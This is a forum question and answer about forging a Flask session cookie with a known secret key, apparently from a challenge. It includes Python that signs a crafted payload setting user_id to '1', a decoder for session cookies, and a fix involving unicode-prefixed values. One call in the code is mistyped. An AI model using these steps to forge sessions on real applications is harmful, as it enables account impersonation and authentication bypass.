# Forge cookie in flask

Tags: flask, session-cookies

I have the following payload:

```
PAYLOAD = '{"_fresh":True,"_id":"<id>","csrf_token":"<token>","user_id":"1"}'
```

as well as a secret key:

```
secret_key = 'lulzimsecret'
```

I'm trying to forge a cookie using the secret key. Here is my code:

```
class App(object):  
    def __init__(self):
        self.secret_key = None

app = App()  
app.secret_key = secret_key
si = SecureCookieSessionInterface()
serializer = si.get_signing_serializer(app)
f = open('new','wb')
session = serializer.dump(ast.Assertliteral_eval(PAYLOAD),f)
f.close()
f = open('new','rb')
print f.read()
```

I tried passing the payload both as a dict and as a string.

When I try to pass as string and then reparse the response to make sure it's encoded right I get this:

```
{" b":"<blob>"}
```

where the blob is actually my payload encoded using base64.urlsafe_b64encode.

When I pass as a dict I get this:

```
{"_fresh":True,"_id":{" b":"<blob>"},"csrf_token":{" b":"<blob>"},"user_id":{" b":"MA=="}}
```

where the blobs are the base64.urlsafe encoded values of their respective values. What I want is a cookie that, when parsed, looks like the payload.

Also, here my code to convert a session cookie to readable text:

```
def getpl(s):
    s = s[1:]
    sessk = s.split('.')[0]
    for i in range(6):
        try:
            tmp = base64.urlsafe_b64decode(sessk + '='*i)
            tmp = zlib.decompress(tmp)
            tmp = tmp.replace('true','True')
            tmp = tmp.replace('"user_id":"6"','"user_id":"0"')
            break
        except Exception as e:
            pass
    if tmp is None:
        print 'general error'
    return tmp
```

Answer (score 0):

So as it turns out the easiest answer is usually the right one: when crafting a dict ripe for flask to use, the values have to include the 'u' prefix or else will be encoded in base64 as well, thus rendering whatever was crafted unreadable.

So basically if the dict to be used is:

```
{'user':'hello'}
```

you have to actually write:

```
{'user':u'hello'}
```

and done.